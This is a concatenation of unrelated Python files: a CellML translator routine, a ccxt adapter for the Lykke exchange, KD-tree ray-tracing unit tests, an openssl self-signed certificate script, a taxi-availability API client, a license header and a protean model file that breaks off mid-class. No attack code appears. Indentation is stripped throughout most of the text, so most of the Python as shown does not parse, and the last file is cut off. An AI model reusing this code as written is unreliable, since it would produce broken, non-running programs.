doc = load_model(model_file, options)
DEBUG('translate', "+++ Loaded model")
config = ConfigurationStore(doc, options=options)
for config_file in options.config_file:
config.read_configuration_file(config_file)
DEBUG('translate', "+++ Read config")
# Apply protocol, if given
if options.protocol:
import protocol
protocol.apply_protocol_file(doc, options.protocol)
if options.debug:
post_proto_cellml = options.outfilename or model_file
post_proto_cellml = os.path.splitext(post_proto_cellml)[0] + '-proto.cellml.ppp'
stream = open_output_stream(post_proto_cellml)
doc.xml(indent=u'yes', stream=stream)
close_output_stream(stream)
DEBUG('translate', "+++ Applied protocol")
config.finalize_config()
DEBUG('translate', "+++ Processed config")
solver_info = SolverInfo(doc.model)
# Generate an interface component, if desired
translator_klass = CellMLTranslator.translators[options.translate_type]
if not options.protocol:
translator_klass.generate_interface(doc, solver_info)
config.validate_metadata(options.assume_valid)
DEBUG('translate', "+++ Generated interface")
if options.lut:
config.find_lookup_variables()
DEBUG('translate', "+++ Found LT keys")
# These bits could do with improving, as they annotate more than is really needed!
if options.pe:
# We need to ensure PE doesn't remove ionic currents needed for GetIIonic
config.annotate_currents_for_pe()
# "Need" to ensure pe doesn't remove metadata-annotated variables (when using modifiers or default stimulus?)
config.annotate_metadata_for_pe()
DEBUG('translate', "+++ Annotated variables")
# Deal with the 'expose' options
config.expose_variables()
class_name = options.class_name
if not class_name:
class_name = doc.model.name.replace('-', '_')
if options.augment_class_name:
class_name = u'CML_' + class_name
if options.pe:
class_name += '_pe'
if options.lut:
class_name += '_lut'
if options.backward_euler:
class_name += '_be'
if options.use_modifiers:
class_name += '_sens'
if options.protocol:
# Try to avoid OdeSystemInformation conflicts
class_name += "_Proto_" + os.path.splitext(os.path.basename(options.protocol))[0]
output_filename = getattr(options, 'outfilename', None)
if not options.translate and not output_filename:
output_filename = 'stdout'
if options.units_conversions:
doc.model.add_units_conversions()
DEBUG('translate', "+++ Added units conversions")
if options.do_jacobian_analysis:
lin = optimize.LinearityAnalyser()
lin.analyse_for_jacobian(doc, V=config.V_variable)
DEBUG('translate', "+++ Analysed model for Jacobian")
if options.maple_output:
# Parse Jacobian matrix
from maple_parser import MapleParser
mp = MapleParser()
        jacobian_file = open(options.maple_output) # TODO: Error checking
doc.model._cml_jacobian = mp.parse(jacobian_file)
doc.model._cml_jacobian_full = mp.JacobianWasFullSize
jacobian_file.close()
if not options.backward_euler and doc.model._cml_jacobian_full:
# Add full jacobian to XML
solver_info.add_jacobian_matrix()
solver_info.add_variable_links()
if options.backward_euler:
# Rearrange linear ODEs
lin = optimize.LinearityAnalyser()
lin.analyse_for_jacobian(doc, V=config.V_variable)
lin.rearrange_linear_odes(doc)
# Remove jacobian entries that don't correspond to nonlinear state variables
jacobian = doc.model._cml_jacobian
if isinstance(jacobian, tuple):
assert doc.model._cml_jacobian_full
jacobian = jacobian[1]
nonlinear_vars = set([v.get_source_variable(recurse=True) for v in doc.model._cml_nonlinear_system_variables])
def gv(vname):
return cellml_variable.get_variable_object(doc.model, vname).get_source_variable(recurse=True)
for var_i, var_j in jacobian.keys():
if gv(var_i) not in nonlinear_vars or gv(var_j) not in nonlinear_vars:
del jacobian[(var_i, var_j)]
if doc.model._cml_jacobian_full:
# Transform the Jacobian into the form needed by the Backward Euler code
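                # i.e. build the backward Euler iteration matrix: entry (i,j) becomes
                # delta_ij - delta_t * J_ij, so diagonal entries start from 1 and every
                # non-zero entry has delta_t times the Maple Jacobian subtracted below.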
import maple_parser
for key, expr in jacobian.iteritems():
new_expr = None
if key[0] == key[1]:
# 1 on the diagonal
new_expr = maple_parser.MNumber(['1'])
if not (isinstance(expr, maple_parser.MNumber) and str(expr) == '0'):
# subtract delta_t * expr
args = []
if new_expr:
args.append(new_expr)
args.append(maple_parser.MOperator([maple_parser.MVariable(['delta_t']), expr], 'prod', 'times'))
new_expr = maple_parser.MOperator(args, '', 'minus')
if new_expr:
jacobian[key] = new_expr
# Add info as XML
solver_info.add_all_info()
# Analyse the XML, adding cellml_variable references, etc.
solver_info.add_variable_links()
solver_info.add_linear_ode_update_equations()
DEBUG('translate', "+++ Parsed and incorporated Maple output")
else:
options.include_dt_in_tables = False
if options.lut:
# Create the analyser so PE knows which variables are table keys
lut = optimize.LookupTableAnalyser()
else:
lut = None
if options.pe:
# Do partial evaluation
pe = optimize.PartialEvaluator()
pe.parteval(doc, solver_info, lut)
DEBUG('translate', "+++ Done PE")
if options.lut:
# Do the lookup table analysis
lut.analyse_model(doc, solver_info)
DEBUG('translate', "+++ Done LT analysis")
if options.rush_larsen:
rl = optimize.RushLarsenAnalyser()
rl.analyse_model(doc)
DEBUG('translate', "+++ Done Rush-Larsen analysis")
if options.translate:
# Translate to code
initargs = {'add_timestamp': not options.no_timestamp,
'options': options}
transargs = {'v_variable': config.V_variable}
transargs['row_lookup_method'] = options.row_lookup_method
transargs['lt_index_uses_floor'] = options.lt_index_uses_floor
transargs['constrain_table_indices'] = options.constrain_table_indices
if issubclass(translator_klass, CellMLToMapleTranslator):
initargs['omit_constants'] = options.omit_constants
initargs['compute_full_jacobian'] = options.compute_full_jacobian
elif issubclass(translator_klass, CellMLToChasteTranslator):
solver_info.add_membrane_ionic_current()
transargs['use_chaste_stimulus'] = options.use_chaste_stimulus
transargs['separate_lut_class'] = options.separate_lut_class
transargs['convert_interfaces'] = options.convert_interfaces
transargs['use_modifiers'] = options.use_modifiers
transargs['use_data_clamp'] = options.use_data_clamp
transargs['dynamically_loadable'] = options.dynamically_loadable
transargs['use_protocol'] = bool(options.protocol)
t = translator_klass(**initargs)
t.translate(doc, model_file, output_filename, class_name=class_name, **transargs)
cellml_metadata.remove_model(doc.model)
else:
# Add a comment element
comment = pycml.comment_base(
body=u'\n' + version_comment(not options.no_timestamp) + u'\n')
doc.xml_insert_before(doc.model, comment)
# Output annotated model
stream = open_output_stream(output_filename)
doc.xml(indent=u'yes', stream=stream)
close_output_stream(stream)
DEBUG('translate', "+++ Done translation")
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
class lykke (Exchange):
def describe(self):
return self.deep_extend(super(lykke, self).describe(), {
'id': 'lykke',
'name': 'Lykke',
'countries': 'CH',
'version': 'v1',
'rateLimit': 200,
'has': {
'CORS': False,
'fetchOHLCV': False,
'fetchTrades': False,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchOrders': True,
},
'requiredCredentials': {
'apiKey': True,
'secret': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/34487620-3139a7b0-efe6-11e7-90f5-e520cef74451.jpg',
'api': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-api.lykke.com/api',
'private': 'https://hft-api.lykke.com/api',
'test': {
'mobile': 'https://api.lykkex.com/api',
'public': 'https://hft-service-dev.lykkex.net/api',
'private': 'https://hft-service-dev.lykkex.net/api',
},
},
'www': 'https://www.lykke.com',
'doc': [
'https://hft-api.lykke.com/swagger/ui/',
'https://www.lykke.com/lykke_api',
],
'fees': 'https://www.lykke.com/trading-conditions',
},
'api': {
'mobile': {
'get': [
'AllAssetPairRates/{market}',
],
},
'public': {
'get': [
'AssetPairs',
'AssetPairs/{id}',
'IsAlive',
'OrderBooks',
'OrderBooks/{AssetPairId}',
],
},
'private': {
'get': [
'Orders',
'Orders/{id}',
'Wallets',
],
'post': [
'Orders/limit',
'Orders/market',
'Orders/{id}/Cancel',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.0, # as of 7 Feb 2018, see https://github.com/ccxt/ccxt/issues/1863
'taker': 0.0, # https://www.lykke.com/cp/wallet-fees-and-limits
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {
'BTC': 0.001,
},
'deposit': {
'BTC': 0,
},
},
},
})
def fetch_balance(self, params={}):
self.load_markets()
balances = self.privateGetWallets()
result = {'info': balances}
for i in range(0, len(balances)):
balance = balances[i]
currency = balance['AssetId']
total = balance['Balance']
used = balance['Reserved']
free = total - used
result[currency] = {
'free': free,
'used': used,
'total': total,
}
return self.parse_balance(result)
def cancel_order(self, id, symbol=None, params={}):
return self.privatePostOrdersIdCancel({'id': id})
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
query = {
'AssetPairId': market['id'],
'OrderAction': self.capitalize(side),
'Volume': amount,
}
if type == 'market':
query['Asset'] = market['base'] if (side == 'buy') else market['quote']
elif type == 'limit':
query['Price'] = price
method = 'privatePostOrders' + self.capitalize(type)
result = getattr(self, method)(self.extend(query, params))
return {
'id': None,
'info': result,
}
def fetch_markets(self):
markets = self.publicGetAssetPairs()
result = []
for i in range(0, len(markets)):
market = markets[i]
id = market['Id']
base = market['BaseAssetId']
quote = market['QuotingAssetId']
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = market['Name']
precision = {
'amount': market['Accuracy'],
'price': market['InvertedAccuracy'],
}
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'active': True,
'info': market,
'lot': math.pow(10, -precision['amount']),
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision['amount']),
'max': math.pow(10, precision['amount']),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': math.pow(10, precision['price']),
},
},
})
return result
def parse_ticker(self, ticker, market=None):
timestamp = self.milliseconds()
symbol = None
if market:
symbol = market['symbol']
ticker = ticker['Result']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['Rate']['Bid']),
'ask': float(ticker['Rate']['Ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': None,
'quoteVolume': None,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.mobileGetAllAssetPairRatesMarket(self.extend({
'market': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_order_status(self, status):
if status == 'Pending':
return 'open'
elif status == 'InOrderBook':
return 'open'
elif status == 'Processing':
return 'open'
elif status == 'Matched':
return 'closed'
elif status == 'Cancelled':
return 'canceled'
elif status == 'NotEnoughFunds':
return 'NotEnoughFunds'
elif status == 'NoLiquidity':
return 'NoLiquidity'
elif status == 'UnknownAsset':
return 'UnknownAsset'
elif status == 'LeadToNegativeSpread':
return 'LeadToNegativeSpread'
return status
def parse_order(self, order, market=None):
status = self.parse_order_status(order['Status'])
symbol = None
if not market:
if 'AssetPairId' in order:
if order['AssetPairId'] in self.markets_by_id:
market = self.markets_by_id[order['AssetPairId']]
if market:
symbol = market['symbol']
timestamp = None
if 'LastMatchTime' in order:
timestamp = self.parse8601(order['LastMatchTime'])
elif 'Registered' in order:
timestamp = self.parse8601(order['Registered'])
elif 'CreatedAt' in order:
timestamp = self.parse8601(order['CreatedAt'])
price = self.safe_float(order, 'Price')
amount = self.safe_float(order, 'Volume')
remaining = self.safe_float(order, 'RemainingVolume')
        filled = amount - remaining
        cost = filled * price if price is not None else None
result = {
'info': order,
'id': order['Id'],
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': None,
'price': price,
'cost': cost,
'average': None,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
}
return result
def fetch_order(self, id, symbol=None, params={}):
response = self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders()
return self.parse_orders(response, None, since, limit)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'InOrderBook',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privateGetOrders(self.extend({
'status': 'Matched',
}, params))
return self.parse_orders(response, None, since, limit)
def fetch_order_book(self, symbol, limit=None, params={}):
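        # The API returns the book as a list of side objects; illustrative shape:
        #   [{'IsBuy': True, 'Timestamp': '...', 'Prices': [{'Price': ..., 'Volume': ...}, ...]},
        #    {'IsBuy': False, ...}]
        # The sides are merged below and the newest side timestamp is kept.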
self.load_markets()
response = self.publicGetOrderBooksAssetPairId(self.extend({
'AssetPairId': self.market_id(symbol),
}, params))
orderbook = {
'timestamp': None,
'bids': [],
'asks': [],
}
timestamp = None
for i in range(0, len(response)):
side = response[i]
if side['IsBuy']:
orderbook['bids'] = self.array_concat(orderbook['bids'], side['Prices'])
else:
orderbook['asks'] = self.array_concat(orderbook['asks'], side['Prices'])
timestamp = self.parse8601(side['Timestamp'])
if not orderbook['timestamp']:
orderbook['timestamp'] = timestamp
else:
orderbook['timestamp'] = max(orderbook['timestamp'], timestamp)
if not timestamp:
timestamp = self.milliseconds()
return self.parse_order_book(orderbook, orderbook['timestamp'], 'bids', 'asks', 'Price', 'Volume')
def parse_bid_ask(self, bidask, priceKey=0, amountKey=1):
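        # Illustrative input (hypothetical): {'Price': 0.5, 'Volume': -100} with
        # priceKey='Price', amountKey='Volume' returns [0.5, 100.0]; volumes may be
        # reported negative on the sell side, so they are normalised to positive here.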
price = float(bidask[priceKey])
amount = float(bidask[amountKey])
if amount < 0:
amount = -amount
return [price, amount]
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
if method == 'GET':
if query:
url += '?' + self.urlencode(query)
self.check_required_credentials()
headers = {
'api-key': self.apiKey,
'Accept': 'application/json',
'Content-Type': 'application/json',
}
if method == 'POST':
if params:
body = self.json(params)
return {'url': url, 'method': method, 'body': body, 'headers': headers}
|
from unittest import TestCase, skip
import copy
import numpy as np
from giant import rotations as at
from giant.ray_tracer import kdtree, shapes, rays
class TestKDTree(TestCase):
def setUp(self):
self.max_depth = 4
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
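        # Geometry note: four congruent unit-height triangles in the z=0 plane, spaced
        # 2.5 apart along x (tri1 spans x in [-5, -4], ..., tri4 spans x in [2.5, 3.5]).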
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1,
np.arange(12).reshape(-1, 3))
self.shapes = self.triangles
self.stacked_tries = shapes.Triangle64(np.hstack([tri1, tri2,
tri1+[[0], [0], [2.5]],
tri2 + [[0], [0], [2.5]]]).T, 1,
np.arange(12).reshape(-1, 3))
def test_creation(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
self.assertEqual(tree.max_depth, self.max_depth)
self.assertEqual(tree.surface, self.shapes)
def test_build(self):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
facets = np.arange(12).reshape(-1, 3)
tris = [shapes.Triangle64(self.triangles.vertices, self.triangles.albedos, face)
for face in facets]
for tri in tris:
tri.bounding_box = None
node20 = kdtree.KDNode(tris[0])
node21 = kdtree.KDNode(tris[1])
node22 = kdtree.KDNode(tris[2])
node23 = kdtree.KDNode(tris[3])
node10 = kdtree.KDNode()
node10.bounding_box = shapes.AxisAlignedBoundingBox([-5, 0, 0], [-1.5, 1, 0])
node10.left = node20
node10.right = node21
node11 = kdtree.KDNode()
node11.bounding_box = shapes.AxisAlignedBoundingBox([0., 0, 0], [3.5, 1, 0])
node11.left = node22
node11.right = node23
node00 = kdtree.KDNode()
node00.bounding_box = self.triangles.bounding_box
node00.left = node10
node00.right = node11
node00.order = 0
self.assertEqual(node00, tree.root)
def test_trace(self):
with self.subTest(stacked=False):
tree = kdtree.KDTree(self.shapes, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, 0.5, 3],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 1, 1]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.left.right, tree.root.right.left, tree.root.right.right]
with self.subTest(rotation=None, translation=None):
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertFalse(int_check["check"])
self.assertTrue(np.isnan(int_check["intersect"]).all())
self.assertTrue(np.isnan(int_check["normal"]).all())
self.assertTrue(np.isnan(int_check["albedo"]))
self.assertEqual(int_check["facet"], -1)
rotation = at.Rotation([0, 0, -np.pi / 2])
rays_test.ignore = None
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [0, 0, -0.5]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1.5])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(rotation=rotation, translation=translation):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[0.5, 0.5, 0.5, 0.5],
[4.5, 2, -0.5, -3],
[1, 1, 1, 1]])
directions2 = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 0, 1.5])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
rotation = at.Rotation([np.pi / 2, 0, 0])
with self.subTest(rotation=rotation, translation=None):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
translation = [2.5, 0, 0]
with self.subTest(rotation=None, translation=translation):
tc = copy.deepcopy(tree)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"][0])
for ind, int_check in enumerate(ints[1:]):
ind += 1
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
np.testing.assert_array_almost_equal(int_check["normal"], self.triangles.normals[ind-1])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind-1].id*(10**(tc.root.order+1)))
translation = [0, -0.5, 0]
with self.subTest(rotation=rotation, translation=translation):
with self.subTest(order='rt'):
tc = copy.deepcopy(tree)
tc.rotate(rotation)
tc.translate(translation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0.5, 0.5, 0.5, 0.5]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1.5, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(order='tr'):
tc = copy.deepcopy(tree)
tc.translate(translation)
tc.rotate(rotation)
ints = tc.trace(rays_test)
self.assertFalse(ints["check"].any())
starts2 = np.array([[-4.5, -2, 0.5, 3],
[1, 1, 1, 1],
[0, 0, 0, 0]])
directions2 = np.array([[0, 0, 0, 0],
[-1, -1, -1, -1],
[0, 0, 0, 0]], dtype=np.float64)
rays_test2 = rays.Rays(starts2, directions2)
ints = tc.trace(rays_test2)
for ind, int_check in enumerate(ints):
# int_check = int_check[0]
self.assertTrue(int_check["check"])
np.testing.assert_array_almost_equal(int_check["intersect"], starts2[:, ind]-[0, 1, 0])
np.testing.assert_array_equal(int_check["normal"], rotation.matrix@self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tc.root.order+1)))
with self.subTest(stacked=True):
tree = kdtree.KDTree(self.stacked_tries, max_depth=self.max_depth)
tree.build(force=True, print_progress=False)
starts = np.array([[-4.5, -2, -4.5, -2],
[0.5, 0.5, 0.5, 0.5],
[1, 1, 5, 5]])
directions = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[-1, -1, -1, -1]], dtype=np.float64)
rays_test = rays.Rays(starts, directions)
ints = tree.trace(rays_test)
nodes = [tree.root.left.left, tree.root.right.left, tree.root.left.right, tree.root.right.right]
for ind, int_check in enumerate(ints):
with self.subTest(ignore=False, ind=ind):
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
ignore_ind = 2
rays_test.ignore = [nodes[ignore_ind].id*(10**(tree.root.order+1))]*rays_test.num_rays
ints = tree.trace(rays_test)
for ind, int_check in enumerate(ints):
with self.subTest(ignore=True, ind=ind):
if ind != ignore_ind:
# int_check = int_check[0]
self.assertTrue(int_check["check"])
if ind < 2:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 1])
else:
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 2.5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[ind].id*(10**(tree.root.order+1)))
else:
self.assertTrue(int_check["check"])
np.testing.assert_array_equal(int_check["intersect"], starts[:, ind]-[0, 0, 5])
np.testing.assert_array_equal(int_check["normal"], self.triangles.normals[ind])
self.assertEqual(int_check["albedo"], 1.0)
self.assertEqual(int_check["facet"], 0+nodes[0].id*(10**(tree.root.order+1)))
class TestKDNode(TestCase):
def setUp(self):
tri1 = np.array([[-5, -4, -4.5],
[0, 0, 1],
[0, 0, 0]])
tri2 = tri1+np.array([[2.5, 0, 0]]).T
tri3 = tri2+np.array([[2.5, 0, 0]]).T
tri4 = tri3+np.array([[2.5, 0, 0]]).T
self.triangles = shapes.Triangle64(np.hstack([tri1, tri2, tri3, tri4]).T, 1, np.arange(12).reshape(-1, 3))
def test_creation(self):
node = kdtree.KDNode(surface=self.triangles)
self.assertEqual(node.surface, self.triangles)
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
self.assertIsNone(node.left)
self.assertIsNone(node.right)
def test_compute_bounding_box(self):
node = kdtree.KDNode()
node.surface = self.triangles
node.has_surface = True
node.compute_bounding_box()
self.assertEqual(node.bounding_box, self.triangles.bounding_box)
def test_split(self):
node = kdtree.KDNode(surface=self.triangles)
node.split(force=True, print_progress=False)
        left_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6).reshape(-1, 3), compute_bounding_box=False))
        right_tris = kdtree.KDNode(shapes.Triangle64(self.triangles.vertices, 1, np.arange(6, 12).reshape(-1, 3), compute_bounding_box=False))
self.assertEqual(node.left, left_tris)
self.assertEqual(node.right, right_tris)
def test_trace(self):
# TODO: figure out how to implement this
pass
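        # Sketch of one possible approach (assumption: KDNode exposes a trace()
        # compatible with the tree-level trace exercised in TestKDTree above):
        # wrap self.triangles in a single KDNode, fire the same straight-down
        # rays used in TestKDTree.test_trace, and compare the node's hits
        # against the known intersection points facet by facet.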
|
#!/usr/bin/python3
from subprocess import call
from sys import argv
from os import path
outPath = argv[1] if len(argv) > 1 else "/etc/dipicar/creds"
duration = 365
rsaLength = 4096
#Generate ssl keys
call([
"openssl",
"req",
"-x509",
"-newkey",
"rsa:"+str(rsaLength),
"-keyout", path.join(outPath,"key.pem"),
"-out", path.join(outPath,"cert.pem"),
"-days", str(duration),
"--batch",
"-nodes"
])
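# To sanity-check the generated certificate afterwards (standard openssl usage):
#   openssl x509 -in <outPath>/cert.pem -noout -text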
|
import requests
import os
ROOT_URL = 'http://datamall2.mytransport.sg/ltaodataservice'
def get_taxi_availability_request():
result = None
try:
url = '{}/Taxi-Availability'.format(ROOT_URL)
headers = {
'AccountKey': os.getenv('ACCOUNT_KEY'),
'Accept': 'application/json'
}
response = requests.get(url, headers=headers)
print('response status = ', response.status_code)
print('response json = ', response.json())
if response.status_code == 200:
result = response.json()
except Exception as e:
print('error = ', e)
return result
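# Minimal usage sketch (assumes a valid LTA DataMall key exported as the
# ACCOUNT_KEY environment variable; the endpoint and headers are the ones
# used above):
if __name__ == '__main__':
    data = get_taxi_availability_request()
    if data is not None:
        # DataMall OData responses carry their records under a 'value' key.
        print('taxi positions returned =', len(data.get('value', [])))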
|
# The MIT License (MIT)
# Copyright (c) 2018 by EUMETSAT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from ._mappings import MAPPINGS, API_URL_PREFIX
|
import re
from collections import defaultdict
from datetime import datetime
from elasticsearch_dsl import Keyword, Text
from protean import BaseAggregate, BaseValueObject
from protean.core.model import BaseModel
from protean.fields import DateTime, Integer, String
from protean.fields import Text as ProteanText
from protean.fields import ValueObject
class Person(BaseAggregate):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
    created_at = DateTime(default=datetime.now)  # assumption: protean resolves callable defaults; passing the callable avoids freezing the timestamp at import time
class Alien(BaseAggregate):
